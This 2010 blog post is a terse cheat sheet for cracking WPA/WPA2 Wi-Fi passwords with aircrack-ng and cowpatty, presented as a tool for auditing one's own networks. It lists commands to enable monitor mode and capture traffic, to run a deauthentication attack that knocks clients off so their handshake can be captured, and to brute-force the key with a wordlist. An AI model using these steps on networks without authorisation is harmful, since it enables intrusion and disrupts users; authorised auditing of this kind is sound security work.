Tuesday, June 1, 2010

WPA/WPA2 PSK cracking quick reference

There are too many guides and resources out there to doing this stuff so i wont be giving much explanation and theory on WPA hacking. Remember, this should only be performed on networks that you have permission to audit the security of. This here will serve as a quick and dirty cheatsheet of commands necessary to potentially audit the strength/weakness of your wireless networks using the aircrack-ng or cowpatty to bruteforce the password using a wordlist.

# airmon-ng start wlan0
// put interface in monitor mode

# airodump-ng mon0 // scan air for targets

# airodump-ng --channel 1 --bssid "AP_MAC_addr" -w wpa.cap mon0 //filter capture packets from a specific AP's MAC address and channel

#aireplay-ng --deauth 5 -a "AP_MAC_addr" -c "Client_MAC_addr" mon0 //Perform a deauthentication attack on a client to force reassociation in hope of capturing WPA handshake

When Handshake is captured

using cowpatty:
# cowpatty -f passwords.lst -r wpa.cap -s "essid_of_network" //attempt to bruteforce the password using wordlist

using aircrack-ng:
# aircrack-ng -w passwords.lst -e "essid_of_network" wpa.cap //attempt to bruteforce the password using wordlist

No comments:

Post a Comment